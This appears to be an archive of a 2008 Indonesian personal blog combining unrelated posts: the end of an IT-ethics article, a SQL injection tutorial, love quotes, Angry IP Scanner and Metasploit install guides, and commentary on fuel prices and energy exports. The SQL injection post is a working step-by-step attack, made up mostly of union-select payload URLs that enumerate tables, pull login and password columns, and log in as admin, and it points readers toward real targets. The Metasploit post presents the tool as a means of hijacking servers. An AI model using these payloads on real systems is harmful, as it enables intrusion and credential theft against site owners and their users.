Liberal: sejak "CEO" sudah mempunyai aplikasi enkripsi di komputernya sendiri, ini bukan kesalahan anda sepenuhnya jika dia gagal atau tidak mampu menggunakannya. Kegagalan ini bagian dari yang dihasilkan "CEO" sehingga kompetitor sekarang mempunyai akses ke data yang paling sensitif di perusahaan anda.

saran

-------------------

Konsultasikanlah terlebih dahulu akan pentinganya persiapan, pemahaman dan implementasi privasi dan keamanan data kepada seluruh karyawan dan pejabat di perusahaan anda sebelum mulai menggunakan aplikasi nekripsi dan mengirimkan data kepada mitra kerja perusahaan.

-------------------

--| In Industrial Espionage Ethical? - biasakah dilakukan ?

Seperti contoh diatas, apakah kompetitor yang "menyadap" "e-mail" telah bertindak etis ?

Konservatif: tidak!. "menyadap" "e-mail" dan mencuri data sensitif perusahaan lain sangatlah tidak etis dan merupakan kegiatan yang jelek. Sangatlah tidak perlu untuk mengambil "keuntungan" agar dapat lebih maju dari yang lain. Liberal: "all is fair in love and war", kompetitor lebih tahu perusahaan anda daripada anda mengetahui diri anda sendiri dan mengawasi kelemahan keamanan. Anda harus mengantisipasi tipe dari aksi ini didalam dunia perindustrian dan harus bersiap sedia untuk keadaan itu.

saran

-------------------

Pengintaian industri adalah kegiatan dimana mencuri data dan ide dari perusahaan lain, yang dimana biasa dilakukan. Semua bisnis perlu untuk menjaga komputer, dokumen penting, personil dan kantor dari kegiatan seperti ini.

-------------------

-- -- -( Handling Network Security Information )-

Keamanan informasi dalam jaringan komputasi adalah untuk melaporkan apabila terdapat kelemahan atau tidak berfungsinya dan penyusupan yang mempengaruhi keamanan dari sebuah jaringan komputasi.

--| Software Malfunctions - haruskah anda melaporkannya ?

Seorang pegawai dari perusahaan anda gagal dalam melaporkan bahwa sebuah perangkat lunak mengalami kegagalan system, yang dimana menyebabkan data terekspos keluar ke internet. Apakah kegagalan untuk melaporkan insiden tersebut tidak etis ?

Konservatif: kegagalan dalam melaporkan tidak berfungsinya keamanan system sama burukna dengan membuat itu sendiri. Jika staff IT tidak waspada pada masalah yang terjadi di system, mereka secara tidak langsung tidak mampu untuk melindungi sumber daya system beserta informasi didalamnya.

Liberal: pegawai tersebut mungkin tidak mengerti lebih jauh mengenai masalah itu dan gagal dalam melaporkan insiden itu dikarenakan mereka tidak mengerti resiko yang dihadapi yang menyangkut secara keseluruhan dari keamanan informasi. Dia tidak melakukan sesuatu yang tidak etis.

saran

-------------------

Staff IT menyediakan perhatian yang lumayan akan kewaspadaan terhadap keamanan sehingga masalah diatas tidak akan pernah muncul. Jika pegawai telah mepersiapkan sedikit perhatian dan tetap gagal dalam menyediakan laporan insiden, maka mereka sudah memasuki batas dari lemahnya tanggung jawab kepada perusahaan.

-------------------

--| Stealth Sniffer - meningkatkan keamanan.

Anda menemukan sebuah aplikasi pengendus (sniffer) yang sedang mengawasi jaringan anda. Apakah seseorang mempunyai hak untuk aktifitas ini? Konservatif: tidak ada seorangpun yang berhak untuk mengawasi jaringan anda. Aktifitas ini sangat tidak etis dan harus ditindak lanjuti, apakah orang ini adalah pegawai dari perusahaan tempat anda bekerja atau seorang kompetitor perusahaan yang terlibat dalam pengintaian industri (industry espionage). Liberal: bila jaringan komputasi anda tidak aman, maka anda mengundang sebuah serangan dan pengintai. Perhatikan masalah yang ditimbulkan dari orang ini apa bila dia menjalankan "sniffer" dan mengawasi jaringan komputasi anda.

saran

-------------------

Staff IT harus memastikan tanggung jawab pada semua aspek dari penyusupan jaringan komputasi. Mereka harus segera meningkatkan keamanan system untuk menghindari aktifitas tersebut; bagaimanapun juga, anda sebagai orang yang bertanggung jawab akan keamanan jaringan komputasi, telah gagal bertindak sebagaimana seharusnya jika anda tidak melakukan sesuatu untuk menanggulanginya.

-------------------

-- -- -( Ensuring Information Security on the Personnel Level )-

Staff IT juga bertanggung jawab pada tinkat personil. Masalah seperti berbohon kepada klien akan integritas dari keamanan informasi pada jaringan komputasi merupakan tanggung jawab anda.

--| Lying to Clients Regarding Corporate Security - apakah ini ide bagus ?

Pimpinan anda meminta untuk memberitahu kepada klien bahwa keamanan jaringan komputasi perusahaan sangat bagus, yang dimana mustahil untuk disusupi. Anda, sebegai orang yang bertanggung jawab atas keamanan jaringan komputasi perusahaan ini bukan intinya. System akan aman sebagaimana seharusnya, tapi tidak ada suatu system yang benar-benar aman dari serangan. Bagaimanapun juga, kebanyakan dari marketing kompetitor melakukan propaganda yang mengatakan bahwa mereka mempunyai system yang tidak dapat disusupi. Dapatkah anda dengan bangga mengeluarkan pernyataan ini kepada klien untuk pimpinan anda?

Konservatif: sebegai orang yang bertanggung jawab, anda harus menjaga ketingkat yang paling tinggi dari integritas. Jangan pernah katakan apapun apabila itu tidak benar. Jika pimpinan anda atau staff dari marketing sedang membuat pernyataan palsu tentang keamanan system, segera diralat pada ketidak akuratan pernyataan itu. Menjanjikan sesuatu yang benar-benar aman pada perlindungan system sangatlah tidak mungkin dan kemungkinan besar adalah bohong besar.

Liberal: anda dapat membuat pernyataan kepada klien bahwa indikasi infrastruktur seaman yang anda bisa implementasikan dari segenap kemampuan anda. Katakan itu dengan cara yang dapat membuat mereka merasa percaya terhadap keamanan system perusahaan tanpa harus membuat sebuah pernyataan palsu akan garansi pada keamanan absolut, yang dimana itu merupakan mustahil.

saran

-------------------

Kegairahan marketing sering menimbulkan kesamaran pada system informasi. Seorang staff IT perlu untuk menjadi "kuat" terhadap pengaruh mereka akan komunikasi yang di distribusikan oleh marketing dan departemen lain. Seorang staff IT harus memastikan bahwa tidak ada yang dikatakan akan dibalikkan untuk menjatuhkan perusahaan apabila pernyataan itu ternyata tidak akurat atau salah.

-------------------

Doing the Right Thing Under the Pressure of Sales

Some time ago I headed security efforts for a company that provided Web-based financial services as an Application Service Provider (ASP). My responsibilities included interacting with potential clients and explaining the safeguards we had in place to ensure confidentiality and availability of our service. My first sales engagement was a meeting with one of the companys earliest prospective customers.

One of the clients concerns was our lack of a disaster recovery facility that would forestall service interruption if the primary site became inaccessible. Our sales associate reassured the representatives, The secondary data center will be operational by the end of the month. They looked at me for confirmation.

I hesitated for a moment, knowing that my colleague was exaggerating our preparedness. By correcting him, I might jeopardize this critical deal. On the other hand, with a simple nod I would be supporting a commitmentwe probably could not keep. I wanted to say yes, realizing how important the disaster recovery site was to closing this deal, and how much we needed this client.

Our company considered this engagement a cornerstone in our development, a way of demonstrating to other prospects the markets acceptance of our product. There was a good chance of closing the deal at that meeting if I could commit to having the site ready in time. The secondary data center was being built, but we were unlikely to finish it by the end of the month. I would be misleading the client by promising to have the site ready so quickly.

We are in the process of setting up the secondary data center, I explained. I will check the estimated completion date, but there is a chance the site will not be ready by the end of the month. Although we did not close the sale that afternoon, the client did sign up for our service once the disaster recovery site was completed in the following month. When the sales pressure is on, it may be tough to do the right thing. Sometimes it is tough to determine what the right thing is.

- Mark Markevitch

Independent Consultant

-- -- -( Conclusion )-

Saat ini kita telah melihat beberpa pertimbangan etis pada peran teknologi dari seorang staff IT. Kita telah melihat nilai etis dari "hacking", yang dimana disertakan apakah ada keadaan ketika "hacking"

menjadi sesuatu yang secara etis benar. Sekarang anda telah belajar pada tingkat toleransi pada system yang sedang anda tangani dan bagaimana cara yang secara etis benar untuk menyelesaikan apabila suatu masalah pada akhirnya muncul juga ke permukaan. Sehingga pada saat ini anda lebih paham akan pengetahuan mengenai tanggung jawab secara etis dari seorang staff IT.

-- -- -( FAQ (Frequently Asked Questions) )-

Q: Apakah benar secara etis untuk melakukan "hacking" terhadap sebuah system yang bukan kepunyaan anda sendiri ?

A: Dalam banyak kasus anda harus menghindari aktifitas "hacking" terhadap system komputasi yang tidak anda miliki atau anda bertanggung jawab atasnya, ini akan menempatkan karir anda pada bahaya. Bahkan jika staff senior meminta anda untuk melakukan "hacking" terhadap system kompetitor. Keadaan yang melegalkan anda untuk melakukan hacking adalah untuk kepentingan pemerintah dan militer yang dimana anda bertanggung jawab untuk melindungi orang yang tidak berdosa (patriotism).

Q: Apakah benar untuk melakukan test penetrasi yang tidak diizinkan terhadap system yang berada dibawah tanggung jawab anda ?

A: Lagi, dalam banyak kasus, jawabannya adalah tidak!. Melakukan tes penetrasi yang tidak diizinkan dapat menyebabkan system anda berada dalam bahaya. Bagaimanapun juga, apabila anda melakukannya didalam lab komputasi perusahaan ini mungkin dapat diterima dalam peran anda sebagai staff IT yang bertanggung jawab atas keamanan dan kerahasiaan jaringan komputasi perusahaan tempat anda bekerja.

Q: Apakah anda, staff IT, bersalah jika system yang anda lindungi sering diserang oleh virus ?

A: Jawabannya adalah... YA!, anda bertanggung jawab untuk melindungi system dari serangan virus. Mungkin ada dibeberapa keadaan dimana tidak ada yang dapat anda lakukan ataupun perusahaan untuk melindungi tipe serangan seperti ini. Setidaknya, anda harus bisa secara signifikan dapat melindungi system dari kebanyakan tipe serangan ini jika anda mempunyai sumber daya dan kemampuan untuk melakukannya.

Q: Apakah benar untuk mengirimkan data rahasia lewat e-mail tanpa dilakukan enkripsi terlebih dahulu ?

A: Mengirimkan data rahasia tanpa di enkripsi terlebih dahulu tidak dapat diterima. Dapat dimaafkan jika pengirim tidak waspada akan keamanan data dan kerahasiaannya. Bagaimanapun juga, ini merupakan kesalahan staff IT dikarenakan tidak mengkomunikasikan secara benar akan keamanan untuk kepentingan perusahaan.

Q: Bagaimana seharusnya anda menghadapi permintaan untuk berbohong kepada kompetitor peusahaan akan keamanan dari system, yang dimana merupakan tanggung jawab anda sebagai staff IT.

A: Jangan pernah bohong tentang keamanan dari system yang anda tangani. Anda dapat mengaris bawahi beberapa poin penting tapi jangan pernah mengatakan bahwa system anda tidak dapat disusupi demi kepentingan marketing.

-- -- -( Praise )-

+ JC for wealthy life.
+ Jim G. For the conversation after hours. (ussualy midnite on IM).
+ Friends who I'cant mentioned here one by one, you guys are great.
+ fuzk3 (where's the iPod dude?), SJ (where's my order...??), and many other
+ 1stlink, aikmel, e-c-h-o and other covert channel. :)
+ the muse and the rasmus for accompany me late at night.
+ My future wife, eGLa & for her understanding all these years.

-- -- -( Reference )-

[+] IT Ethics Handbook: Right and Wrong for IT Professionals, Syngress Publishing.
[+] Related Material on Internet (forum, web board, articles, white papers, etc.)
[+] www.google.co.id
[+] www.ezine.echo.or.id
[+] echo|zine, volume 4, issue 13

Cara Sederhana SQL Injection MySQL v5

2008-11-29T11:28:00.000+07:00

Komunitas hacker Tanah Air semakin muncul dan melahirkan Hacker-hacker muda berbakat. Berbagai site, server, tak luput dari serangan-serangan anak bangsa. Bahkan situs pemerintah Negara pun tak luput dari serangan. Dari sinilah jati diri seorang hacker akan diuji. Bahwa hacker itu tidak merusak sebuah system yang telah ia hack, bila seorang hacker adalah perusak, itu tak lain adalah seorang cracker(perusak) dan bukan hacker.
Saya sendiri bukan seorang hacker, (masih newbies.. alias orang yang pengen jadi hacker dan masih dalam tahap belajar, belajar, berlatih dan mencoba.
Viva Indonesian Hacker!
check it out!

Pertama cari targetnya. Atau gunakan link berikut biar cepet:

http://72.14.205.100/ ^_^

Misal Kita dapet yang ini:

http://site.com/vuln.php?id=1′ <- errorkita coba cari nama databasenya http://site.com/vuln.php?id=1 union all select 0 from admin

didapat nama databasenya bego

http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables

belum berhasil kita cari jumlah kolomnya

http://site.com/vuln.php?id=1 order by 9/* tidak eror http://site.com/vuln.php?id=1 order by 10/*

eror maka diambil kesimpulan kolomnya berjumlah 9

http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

tidak didapat apa2 tambahkan (-) didepan belakang (=)

http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*

didapat angka 3 untuk mencari nama tabelnya, angka 3 kita ganti dengan table_name

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’/*

didapat nama tabel tblArsipuntuk mencari nama2 tabel lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 4,1/*

sampe gak ada lagi tanda yang muncul di monitormisalkan kita mendapatkan nama tabelnya adalah tbl User sekarang kita akan mencari nama2 kolomnyauntuk mencari nama tabelnya, angka 3 kita ganti dengan column_name

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’/*

didapat nama kolomnya UserNameuntuk mencari nama2 kolom lainnya kita gunakan limit 1,1

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 1,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 2,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 3,1/*

http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 4,1/*

didapat nama kolom UserName, UserLogin, UserPass, UserMailsetelah dapat nama kolom dan tabelnya kita masukkan

http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser

http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser

didapat loginnya admin didapat passnya 1234 tinggal kita cari halaman admin. Misalnya kita temukan

http://site.com/admin.php

tinggal kita masukkan aja
loginnya:admin
passwordnya:1234

author: Andr3^81

referensi
http://andr381.wordpress.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/

Kata Mutiara 1

2008-11-24T19:17:00.000+07:00

Tuhan memberi kita dua kaki untuk berjalan, dua tangan untuk memegang, dua telinga untuk mendengar dan dua mata untuk melihat. Tetapi mengapa Tuhan hanya menganugerahkan sekeping hati pada kita? Karena Tuhan telah memberikan sekeping lagi hati pada seseorang untuk kita mencarinya. Itulah namanya Cinta.

Cinta tidak pernah meminta, ia sentiasa memberi, cinta membawa penderitaan, tetapi tidak pernah berdendam, tak pernah membalas dendam. Di mana ada cinta di situ ada kehidupan; manakala kebencian membawa kepada kemusnahan.~ Mahatma Ghandi

Ada 2 titis air mata mengalir di sebuah sungai. Satu titis air mata tu menyapa air mata yg satu lagi,” Saya air mata seorang gadis yang mencintai seorang lelaki tetapi telah kehilangannya. Siapa kamu pula?”. Jawab titis air mata kedua tu,” Saya air mata seorang lelaki yang menyesal membiarkan seorang gadis yang mencintai saya berlalu begitu sahaja.”

Cinta sejati adalah ketika dia mencintai orang lain, dan kamu masih mampu tersenyum, sambil berkata: aku turut bahagia untukmu.

Jika kita mencintai seseorang, kita akan sentiasa mendoakannya walaupun dia tidak berada disisi kita.

Jangan sesekali mengucapkan selamat tinggal jika kamu masih mau mencoba. Jangan sesekali menyerah jika kamu masih merasa sanggup. Jangan sesekali mengatakan kamu tidak mencintainya lagi jika kamu masih tidak dapat melupakannya.

Perasaan cinta itu dimulai dari mata, sedangkan rasa suka dimulai dari telinga. Jadi jika kamu mahu berhenti menyukai seseorang, cukup dengan menutup telinga. Tapi apabila kamu Coba menutup matamu dari orang yang kamu cintai, cinta itu berubah menjadi titisan air mata dan terus tinggal dihatimu dalam jarak waktu yang cukup lama.

Cinta datang kepada orang yang masih mempunyai harapan walaupun mereka telah dikecewakan. Kepada mereka yang masih percaya, walaupun mereka telah dikhianati. Kepada mereka yang masih ingin mencintai, walaupun mereka telah disakiti sebelumnya dan kepada mereka yang mempunyai keberanian dan keyakinan untuk membangunkan kembali kepercayaan.

Jangan simpan kata-kata cinta pada orang yang tersayang sehingga dia meninggal dunia , lantaran akhirnya kamu terpaksa catatkan kata-kata cinta itu pada pusaranya . Sebaliknya ucapkan kata-kata cinta yang tersimpan dibenakmu itu sekarang selagi ada hayatnya.

Mungkin Tuhan menginginkan kita bertemu dan bercinta dengan orang yang salah sebelum bertemu dengan orang yang tepat, kita harus mengerti bagaimana berterima kasih atas kurniaan itu.

Cinta bukan mengajar kita lemah, tetapi membangkitkan kekuatan. Cinta bukan mengajar kita menghinakan diri, tetapi menghembuskan kegagahan. Cinta bukan melemahkan semangat, tetapi membangkitkan semangat -Hamka

Cinta dapat mengubah pahit menjadi manis, debu beralih emas, keruh menjadi bening, sakit menjadi sembuh, penjara menjadi telaga, derita menjadi nikmat, dan kemarahan menjadi rahmat.

Sungguh menyakitkan mencintai seseorang yang tidak mencintaimu, tetapi lebih menyakitkan adalah mencintai seseorang dan kamu tidak pernah memiliki keberanian untuk menyatakan cintamu kepadanya.

Hal yang menyedihkan dalam hidup adalah ketika kamu bertemu seseorang yang sangat berarti bagimu. Hanya untuk menemukan bahawa pada akhirnya menjadi tidak bererti dan kamu harus membiarkannya pergi.

Kamu tahu bahwa kamu sangat merindukan seseorang, ketika kamu memikirkannya hatimu hancur berkeping.
Dan hanya dengan mendengar kata “Hai” darinya, dapat menyatukan kembali kepingan hati tersebut.

Tuhan ciptakan 100 bahagian kasih sayang. 99 disimpan disisinya dan hanya 1 bahagian diturunkan ke dunia. Dengan kasih sayang yang satu bahagian itulah, makhluk saling berkasih sayang sehingga kuda mengangkat kakinya kerana takut anaknya terpijak.

Kadangkala kamu tidak menghargai orang yang mencintai kamu sepenuh hati, sehinggalah kamu kehilangannya. Pada saat itu, tiada guna sesalan karena perginya tanpa berpatah lagi.

Jangan mencintai seseorang seperti bunga, kerana bunga mati kala musim berganti. Cintailah mereka seperti sungai, kerana sungai mengalir selamanya.

Cinta mampu melunakkan besi, menghancurkan batu, membangkitkan yang mati dan meniupkan kehidupan padanya serta membuat budak menjadi pemimpin. Inilah dasyatnya cinta !

Permulaan cinta adalah membiarkan orang yang kamu cintai menjadi dirinya sendiri, dan tidak merubahnya menjadi gambaran yang kamu inginkan. Jika tidak, kamu hanya mencintai pantulan diri sendiri yang kamu temukan di dalam dirinya.

Cinta itu adalah perasaan yang mesti ada pada tiap-tiap diri manusia, ia laksana setitis embun yang turun dari langit,bersih dan suci. Cuma tanahnyalah yang berlain-lainan menerimanya. Jika ia jatuh ke tanah yang tandus,tumbuhlah oleh kerana embun itu kedurjanaan, kedustaan, penipu, langkah serong dan lain-lain perkara yang tercela. Tetapi jika ia jatuh kepada tanah yang subur,di sana akan tumbuh kesuciaan hati, keikhlasan, setia budi pekerti yang tinggi dan lain-lain perangai yang terpuji.~ Hamka

Kata-kata cinta yang lahir hanya sekadar di bibir dan bukannya di hati mampu melumatkan seluruh jiwa raga, manakala kata-kata cinta yang lahir dari hati yang ikhlas mampu untuk mengubati segala luka di hati orang yang mendengarnya.

Kamu tidak pernah tahu bila kamu akan jatuh cinta. namun apabila sampai saatnya itu, raihlah dengan kedua tanganmu,dan jangan biarkan dia pergi dengan sejuta rasa tanda tanya dihatinya

Cinta bukanlah kata murah dan lumrah dituturkan dari mulut ke mulut tetapi cinta adalah anugerah Tuhan yang indah dan suci jika manusia dapat menilai kesuciannya.

Bukan laut namanya jika airnya tidak berombak. Bukan cinta namanya jika perasaan tidak pernah terluka. Bukan kekasih namanya jika hatinya tidak pernah merindu dan cemburu.

Bercinta memang mudah. Untuk dicintai juga memang mudah. Tapi untuk dicintai oleh orang yang kita cintai itulah yang sukar diperoleh.
Satu-satunya cara agar kita memperolehi kasih sayang, ialah jangan menuntut agar kita dicintai, tetapi mulailah memberi kasih sayang kepada orang lain tanpa mengharapkan balasan.

Angry IP Scanner Ubuntu Linux

2008-08-13T11:30:00.001+07:00

Secara default, linux Ubuntu tidak / belum ada fasilitas atau tools untuk meneriksa ( scanning ) Local Area Network (LAN), berapa komputer yang terkoneksi dengan komputer kita.. Dalam kesempatan kali ini, sedikit ilmu yang mungkin dapat memberi wawasan dan pengetahuan penulis bagaimana kita mendapatkan tool tersebut serta kita dapat mengistall dalam OS Linux Ubuntu. Ya, kalu di Win*** tinggal kita download trus digunakan, udah dech..^^ kalu dalam linux gimana..? ya semoga saja kali ini mampu mempengaruhi pembaca sekalian untuk beralih dalam Linux..hehehe bebas PUNGLI ( Pungutan Lisensi )

Si-keren ini udah banyak perkembangan dan sekarang telah mencapai umur yang ke 3.0 tapi beta..hehehe
saat ini penulis menggunakan OS Linux Ubuntu Hardy 8.04 yang gokil abies...:P jadi disini kita menggunakan paket debian. Tp bila kawan-kawan sekalian menggunakan Os Lain dapat pula surfing DISINI

untuk mendownload angry ip scanner dapat didonlot pada halaman ini atau klik DISINI

untuk installasi, seperti biasa silahkan anda login sebagai root ato ketik

root@n3wb135:# sudo -i
----------
root@n3wb135:# apt-get install ipscan_3.0-beta3_i386.deb
----------
----------------

klu semua proses sudah selesai, silahkan cek pada bagian Aplications >> internet >> Angry IP Scanner..

sekian dulu tips dari saya.. ada kurang dan lebihnya silahkan kirim kritik dan saran yang membangun tentunya ^^

salam,
lfay

Install Metasploit di Ubuntu linux

2008-07-08T18:46:00.000+07:00

Secara default memang aplikasi pendukung internet memang tidak terpasang metasploit framework, akhirnya setelah berselancar di sana sini, ketermu juga bagaimana cara memasang Metasploit Framework.

Sebelum memulai pemasangan ada baiknya kita ketahui dulu apa itu Metasploit. Metasploit adalah sebuah aplikasi dimana terdapat berbagai macam exploit untuk meng-exploitasi sebuah komputer bahkan sebuah web server / website. Jadi dengan singkat kata metasploit ini dapat kita gunaken untuk membajak ( Hacking ) sebuah server.. wuih... keren ga..??

Langsung saja ke intai permasalahan, apa saja yang dibutuhkan untuk memasang Metasploit Framework.
1. Komputer / PC ( ya harus dong!!, kalau kagak ada mana mungkin kita bisa memasang nya ... :D )
2. Cemilan
3. Winamp / musik
4. Software Metasploit Framework
5. Pikiran yang santai, tenang, n rileks pokonya
6. yang paling penting Online Internet ( ini neh yang agak berat... mungkin instal di Laptop rekan-rekan saja)

untuk software dapat di download ------------------DISINI-------------------

Oke saya anggap rekan-rekan sekalian udah dapet software-nya
untuk instalasi langkah-langkahnya
1. Buka terminal rekan-rekan kemudian ketikkan

$ sudo apt-get install ruby libruby rdoc

$ sudo apt-get install libyaml-ruby

$ sudo apt-get install libzlib-ruby

$ sudo apt-get install libopenssl-ruby

$ sudo apt-get install libdl-ruby

$ sudo apt-get install libreadline-ruby

$ sudo apt-get install libiconv-ruby

$ sudo apt-get install rubygems

setelah semua paket sudah didownload dari internet tentunya, selanjutnya masuk ke-direktori software Metasploit Framework lewat terminal tentunya..kemudian ketik

$ tar -zxvf framework-3.1.tar.gz

masuk kedirektori

$ cd /framework-3.1

untuk update silahkan ketik..

$ svn update

Apabila svn rekan tidak terdeteksi atau belum terinstal, ketikan perintah pada terminal anda

$ sudo apt-get install subversion

Terakhir, untuk menjalankannya ketik ja

$ ./msfconsole

apabila telah sukses memasang metasploit, akan ada tampilan diterminal anda kurang lebih seperti ini


               ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                     ##


      =[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
      =[ 46 aux

msf >

untuk perintah-perintah lainya, bagaimana kita meng-eksploitasi server.. tunggu artikel saya selanjutnya..

Migrasi ke Linux yuk..

2008-07-04T10:32:00.000+07:00

Akhirnya setelah menunggu berhari-hari, datang juga ubuntu linux yang gue pesen dari shipit.ubuntu. Penantian lama telah usai..hehehe (kayak apa j neh..)

tanpa pikir panjang akhirnya aku instal ubuntu dengan menduakan si Win ( ukh...kata MUI neh software bajakan tuh haram..gimana tu? masak ilmu yang kita dapet juga haram?? kan percuma..tapi juga nda semua..:D)

Saat ini juga masih berselancar dengan sang Ubuntu 8.04, langsung dech mengKompori temen2 ( meng-kompori = propokator ) buat ganti linux. Yach lumayan juga yang tertarik, tapi malah masih pada berat ninggalin si-Dia ( si-Dia = WinXXX ).

Sekalian untuk info yang mau DOWNLOAD software OS distro linux, dari pada bingung-bingung mending langsung kunjung disini

--- http://repo.ugm.ac.id/iso --- atau klik DISINI ( biar cepet )

Nah disistu, selain banyak sekali distro linux ( hampir 50 distro buset dah...:D ) juga deket sama komputer kita, kan cuma di jogja saja dah deket, free, pokoknya enak dech pakek linux..

Aku kembali dilahirkan..

2008-05-20T09:39:00.000+07:00

Tepat tanggal 18 Mei 2008, tepat juga hari itu aku dilahirkan pada tanggal 18 Mei 1988, tanpa terasa aku sudah berumur 20 tahun :(, genap pula kau berkepala 2.

semoga saja hari² yang aku lalui bisa lebih bermakna dan berarti dari hari² masa muda dulu.

amin..

Genap pula 2 x 24 jam aku hidup selama 20 tahun..banyak sekali halangan,rintangan,suka,duka,sedih,susah,bahagia yang aku lalui sendirian..tanpa ada seseorang yang setia menemani aku..

hanya 1 yang sangat setia kemanapun aku pergi, kemanapun aku beranjak..
( Laptop-Q )
bener dech..kagak ada yang lebih setia dari cintaku yang satu ini..hehehe
buat cintaku kedua..(maafin aku ya..aku jarang maen sama kamu, aku jarang bercinta sama kamu lagi.. kita jarang bersama²), maafin aku telah menduakan kamu, aku tau aku salah..sekarang aku juga jarang bersama dia sayang...

untuk cinta pertamaku ( MS. Visual Basic hehehe..) aku akan selalu merindukan kamu sayang..
buat cintaku yang lain ( Delphi ..@waduh tambah gila neh..heheh ) tenanglah cinta..kita akan bercinta tanpa waktu lagi..tunggu aku, biar aku dapet MODUL untuk mempelajari kamu dan bersenang² dengan kamu..

Sekilas INFO:
maaf saudara² yang diatas tu orang ngawur..tapi berita 10000000% akurat dan tepat pada sasaranya..hehe,untuk lebih jelasnya silahkan....( halah apapula ini cak...?)

sekian terimakasih..

Tabel simulasi harga BBM di Indonesia

2008-05-16T13:52:00.000+07:00

Meski harga minyak naik hingga US$ 100 per barrel, dengan harga BBM yang sekarang Indonesia akan tetap untung sebesar US$ 18 milyar atau rp 168 trilyun per tahun. Kenapa? Karena produksi minyak dalam negeri jauh lebih besar ketimbang impor. Berikut datanya.

Kebutuhan Dalam Negeri : 377,045,000 barrel/tahun

Produksi Dalam Negeri : 350,400,000 barrel/tahun

Ekspor: 234,000,000 barrel/tahun

Impor : 278,000,000 barrel/tahun

Harga minyak LN: 100 US$/barrel

Harga premium DN: 4,500 Rp/liter

Harga premium DN (dollar/barrel) : 78 US$/barrel

Biaya pengolahan minyak/brl : 15 US$/barrel

Catatan: 1 barrel = 159 liter, dan kurs 1 USD=Rp 9.200

Tabel Hasil Simulasi

Anda juga bisa mendownload file xls untuk mensimulasikan kenaikan harga minyak dengan merubah variabel harga minyak LN (warna kuning) dari 100 menjadi 80 atau 200 (terserah anda). Pada semua angka di atas Indonesia tetap untung. Bahkan pada harga US$ 200/barrel pun Indonesia tetap untung US$ 13,9 milyar (Rp 127 trilyun). Untuk mendownload klik:

http://www.mediafire.com/?4gtgahbae4j

Jika perhitungan di atas cukup rumit. Bisa download simulasi di mana ekspor dihilangkan dan perhitungan berdasarkan hari (bukan tahun). Jadi yang dipakai adalah produksi dalam negeri 1 juta bph (bisa dirubah sesuai update data terakhir), kebutuhan dalam negeri 1,2 juta bph (barrel per hari), dan impor 200 ribu bph.

http://www.mediafire.com/?4gdbwgez1gd

Jadi sikap pemerintah Indonesia yang mempertahankan harga minyak seperti sekarang meski ahli minyak seperti Kurtubi mengkritik cukup beralasan.

Sebagian Besar Energi Diekspor - Energi Indonesia untuk Siapa?

2008-05-16T13:47:00.000+07:00

Di bawah ini berbagai artikel yang mengungkap bagaimana Indonesia yang dilanda krisis energi justru merupakan eksportir besar di bidang energi.

Meski rakyat kesulitan mendapatkan energi seperti harus antri minyak tanah berjam-jam, BBM juga sering antri, PLN sering padam (bahkan di Jakarta tadi malam 26 April 2008 padam cukup lama selama berjam-jam) pabrik dan juga pengusaha transportasi merugi karena BBM naik, toh Indonesia merupakan eksportir minyak mentah terbesar di kawasan Australasia. Dari produksi 977 ribu bph (turun dari 1,3 juta bph), 500 ribu bph diekspor. Lebih separuh minyak yang kita produksi diekspor ke luar negeri.

Indonesia juga merupakan eksportir LNG terbesar di dunia. Indonesia mengekspor 70% produk batubara. Energi tersebut diekspor ke Jepang, Korsel, Taiwan, dsb.

Tak heran jika negara-negara yang tak punya minyak tersebut pabrik-pabrik dan industrinya tetap berkembang sementara pabrik-pabrik di Indonesia banyak yang tutup kekurangan energi atau bangkrut karena energi sudah tak terbeli lagi.

Jika sudah begitu, seperti judul artikel Kompas, Energi Indonesia untuk siapa?

Prospek Hubungan Indonesia - Jepang di Bidang Energi

Oleh Hanan Nugroho, PBIK

Jepang adalah tujuan utama ekspor energi Indonesia, yang saat ini merupakan pengekspor minyak mentah terbesar di kawasan Australasia, pengekspor batubara nomer tiga di dunia, dan pengekspor gas alam cair (LNG) terbesar di dunia. Sekitar separuh dari ekspor minyak mentah, lebih seperempat ekspor batubara dan lebih tiga per empat ekspor gas alam cair Indonesia dikirim ke Jepang. Bahkan sebelum memasok ke Korea (1986) dan Taiwan (1990), seluruh produksi gas alam cair Indonesia diekspor ke negeri yang sangat mementingkan penggunaan bahan bakar akrab lingkungan itu

http://www.lab2.kuis.kyoto-u.ac.jp/~raymond/pebola/IndoJpnEnergi.html

RI Lanjutkan Ekspor Gas ke Jepang

